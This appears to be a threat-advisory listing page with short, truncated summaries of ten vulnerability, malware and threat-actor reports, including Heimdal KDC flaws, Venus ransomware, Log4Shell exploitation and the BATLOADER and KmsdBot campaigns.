Heimdal addresses multiple vulnerabilities in v7.7.1
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Heimdal has addressed bugs in Heimdal KDC. A remote intruder can use unwrap des3() to induce a buffer overflow in Heimdal GSSAPI, leading to a denial of service or remote code …
RCE flaw in F5 BIG-IP and BIG-IQ
Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Two security flaws in F5 BIG-IP and BIG-IQ can be exploited to enable remote code execution. An adversary could get persistent root access to the device’s management interface by successfully exploiting …
New Venus Ransomware Targets Healthcare industry
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Venus ransomware, also called Goodgame, has been a source of concern since August 2022. Venus ransomware is an example of the legacy ransomware model: a standalone package sold on underground markets …
Iranian hackers leveraged Log4Shell to penetrate US federal agency
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Iranian APT activity was detected on the networks of federal agencies. The intruders utilized an exploit targeting Log4Shell (CVE-2021-44228) to install XMRig crypto mining software on an unpatched VMware Horizon server. …
Typhon Stealer back with new variant named Typhon Reborn
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Typhon Stealer, a malware who became widely known for its capabilities to steal crypto wallets, monitor keystrokes, and evade antivirus programs, became widely known in early August 2022. Soon after, they …
The DTrack Backdoor campaigns aimed European organizations
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary DTrack, a malware developed by the Lazarus group is a flexible backdoor that unloads malware in stages. It is dispersed with filenames that are routinely used in legitimate executables. The backdoor …
Billbug returns after two years to conduct an espionage campaign
Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary After being widely active in the year 2018-2019, Billbug, a Chinese state-sponsored group, is back after almost two years. They have been attacking multiple government agencies in an Asian country since …
BumbleBee leverages Zerologon to get Domain Controller Access
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Since May 2022, threat actors are leveraging BumbleBee as an initial vector from a Contact Forms campaign. The intrusion started with the delivery of an ISO file that contained an LNK …
BATLOADER- Evasive Malware leverages SEO poisoning
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary “BatLoader” dropper is used to dispense a range of malware tools on victim devices, including a banking Trojan, an information stealer, and the Cobalt Strike post-exploit toolkit. BatLoader malware actors utilize …
KmsdBot Cryptominer Targets the Gaming Industry
Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary KmsdBot is Golang-based malware that leverages the Secure Shell (SSH) cryptographic protocol to obtain access to targeted systems to mine cryptocurrencies and carry out distributed denial-of-service (DDoS) attacks. The malware supports …